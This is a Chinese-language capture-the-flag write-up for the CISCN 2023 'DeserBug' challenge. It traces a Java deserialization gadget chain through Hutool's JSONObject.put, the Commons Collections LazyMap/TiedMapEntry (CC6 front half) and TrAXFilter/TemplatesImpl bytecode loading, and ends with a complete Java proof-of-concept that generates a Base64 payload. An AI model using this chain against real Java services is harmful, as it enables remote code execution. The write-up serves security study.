[CISCN 2023]—DeserBug

DeserBug

  • 题目描述:

    • cn.hutool.json.JSONObject.put->com.app.Myexpect#getAnyexcept
  • 附件

    • 链接:https://pan.baidu.com/s/1lVABZUxmdEmXHL092P-efA?pwd=up9t

题目分析

题目中有两个类:Testapp、Myexpect

Testapp

本地8888端口开启服务,获取bugstr传参内容并进行反序列化

[CISCN 2023]—DeserBug_第1张图片

根据依赖会想到CC反序列化,但题中给到的是CC3.2.2版本,CC自3.2.1后新添加了checkUnsafeSerialization功能对反序列化内容进行检测,而CC链常用到的InvokerTransformer就列入了黑名单中,不过题目给出了另一个类Myexpect

Myexpect

其中getAnyexcept定义了newInstance(),能够实例化一个单参数类

[CISCN 2023]—DeserBug_第2张图片

结合newInstance可以联想到TrAXFilter,借此实现Templates动态加载恶意字节码
[CISCN 2023]—DeserBug_第3张图片

getAnyexcept

接下来就是要找哪里调用了getAnyexcept,根据提示从cn.hutool.json.JSONObject.put查找

cn.hutool.json.JSONObject.put->com.app.Myexpect#getAnyexcept

经过一级级调用发现在PropDesc#getValue(),经过反射调用bean的getter方法

[CISCN 2023]—DeserBug_第4张图片

调用栈

getValue:154, PropDesc (cn.hutool.core.bean)
lambda$copy$0:66, BeanToMapCopier (cn.hutool.core.bean.copier)
accept:-1, 846238611 (cn.hutool.core.bean.copier.BeanToMapCopier$$Lambda$13)
forEach:684, LinkedHashMap (java.util)
copy:48, BeanToMapCopier (cn.hutool.core.bean.copier)
copy:16, BeanToMapCopier (cn.hutool.core.bean.copier)
copy:92, BeanCopier (cn.hutool.core.bean.copier)
beanToMap:713, BeanUtil (cn.hutool.core.bean)
mapFromBean:264, ObjectMapper (cn.hutool.json)
map:114, ObjectMapper (cn.hutool.json)
<init>:210, JSONObject (cn.hutool.json)
<init>:187, JSONObject (cn.hutool.json)
wrap:805, JSONUtil (cn.hutool.json)
set:393, JSONObject (cn.hutool.json)
set:352, JSONObject (cn.hutool.json)
put:340, JSONObject (cn.hutool.json)
put:32, JSONObject (cn.hutool.json)

put

接着就要看哪里调用了put,这里直接结合CC6的前半段即可

put:32, JSONObject (cn.hutool.json)
get:159, LazyMap (org.apache.commons.collections.map)
getValue:74, TiedMapEntry (org.apache.commons.collections.keyvalue)
hashCode:121, TiedMapEntry (org.apache.commons.collections.keyvalue)
hash:339, HashMap (java.util)
readObject:1413, HashMap (java.util)

POC

import cn.hutool.json.JSONObject;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.xml.transform.Templates;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

import static com.app.Tools.getBytes;
import static com.app.Tools.setFieldValue;
import static com.app.Tools.*;

public class POC {
    public static void main(String[] args) throws Exception {
        byte[] bytes = getBytes("Evil");
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates, "_name", "Sentiment");
        setFieldValue(templates, "_class", null);
        setFieldValue(templates, "_bytecodes", new byte[][]{bytes});

        Myexpect myexpect = new Myexpect();
        myexpect.setTargetclass(TrAXFilter.class);
        myexpect.setTypeparam(new Class[]{Templates.class});
        myexpect.setTypearg(new Object[]{templates});

        JSONObject jsonObject = new JSONObject();

        ConstantTransformer transformer = new ConstantTransformer(1);
        Map outerMap  = LazyMap.decorate(jsonObject,transformer);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap , "Sentiment");

        HashMap hashMap = new HashMap();
        hashMap.put(tiedMapEntry, "1");

        jsonObject.remove("Sentiment");
        setFieldValue(transformer,"iConstant",myexpect);

        byte[] serialize = serialize(hashMap);
        System.out.println(Base64.getEncoder().encodeToString(serialize));
        //unserialize(serialize);
    }
}

你可能感兴趣的:(c#,java,json)